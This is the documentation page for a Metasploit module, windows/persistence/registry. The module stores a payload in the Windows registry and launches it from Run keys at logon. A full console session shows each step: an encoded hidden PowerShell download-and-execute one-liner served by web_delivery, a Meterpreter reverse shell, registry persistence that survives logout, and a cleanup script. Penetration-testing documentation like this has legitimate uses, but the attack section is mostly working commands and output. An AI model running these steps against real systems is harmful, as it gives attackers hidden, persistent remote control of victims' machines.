adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1e4527d8338b4f431cdc8011c052d3744e29d7ed
metasploit-gs/documentation/modules/exploit/windows/persistence/registry.md
T
h00die 0f26c9316a registry persistence peer review
2025-10-23 17:44:22 -04:00

166 lines
7.2 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module will install a payload that is executed during boot.
It will be executed either at user logon or system startup via the registry
value in "CurrentVersion\Run" or "RunOnce" (depending on privilege and selected method).
The payload will be installed completely in registry.
## Verification Steps
1. Start msfconsole
2. Get a shell on Windows
3. Do: `use exploit/windows/persistence/registry`
4. Do: `set session #`
5. Do: `run`
6. You should get a shell on user or system login.
## Options
### STARTUP
Startup type for the persistent payload. Options are `USER` and `SYSTEM`, defaults to `USER`.
### BLOB_REG_KEY
The registry key to use for storing the payload blob. Default: random
### BLOB_REG_NAME
The name to use for storing the payload blob. Default: random
### RUN_NAME
The name to use for the `Run` key. Default: random
### SLEEP_TIME
Amount of time to sleep (in seconds) before executing payload. Default: 0
### REG_KEY
Registry Key To Install To. Options are `Run` and `RunOnce`. Defaults to `Run`
## Scenarios
### Windows 10 22H2+ User access
Obtain original shell
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 2
target => 2
resource (/root/.msf4/msfconsole.rc)> set srvport 8085
srvport => 8085
resource (/root/.msf4/msfconsole.rc)> set uripath w2
uripath => w2
resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4449
lport => 4449
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4449
[*] Using URL: http://1.1.1.1:8085/w2
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABwADAAMwB4AG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAcAAwADMAeABuAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAcAAwADMAeABuAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBzAHUAWABJAE4AUgBnAGYAagBwAHUAbwAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIAJwApACkAOwA=
msf exploit(multi/script/web_delivery) >
[*] 2.2.2.2 web_delivery - Powershell command length: 3709
[*] 2.2.2.2 web_delivery - Delivering Payload (3709 bytes)
[*] Sending stage (230982 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:50218) at 2025-10-19 09:24:28 -0400
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 22H2+ (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
```
Persistence
```
msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/registry
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/registry) > set session 1
session => 1
msf exploit(windows/persistence/registry) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/registry) > check
[+] Powershell detected on system
[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Ws7IB4gE1WPHLZb
[+] The target is vulnerable. Registry writable
msf exploit(windows/persistence/registry) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(windows/persistence/registry) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KXBPUprYbD5frAT
[+] The target is vulnerable. Registry writable
[*] Generating payload blob..
[*] Powershell command length: 6885
[+] Generated payload, 6816 bytes
[*] Root path is HKCU
[*] Installing payload blob..
[+] Created registry key HKCU\Software\meCSomm1
[+] Installed payload blob to HKCU\Software\meCSomm1\haUGCPh4
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\O4aWIeM8
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc
```
Logout user (killing original shell), and log back in
```
msf exploit(windows/persistence/registry) > [*] 2.2.2.2 - Meterpreter session 1 closed. Reason: Died
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50225) at 2025-10-19 09:28:43 -0400
msf exploit(windows/persistence/registry) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 2...
```
Cleanup
```
msf exploit(windows/persistence/registry) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc)> reg deleteval -k 'HKCU\Software\meCSomm1' -v 'haUGCPh4'
Successfully deleted haUGCPh4.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc)> reg deletekey -k 'HKCU\Software\meCSomm1'
Successfully deleted key: HKCU\Software\meCSomm1
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc)> reg deleteval -k 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' -v 'O4aWIeM8'
Successfully deleted O4aWIeM8.
meterpreter >
```
Reference in New Issue View Git Blame Copy Permalink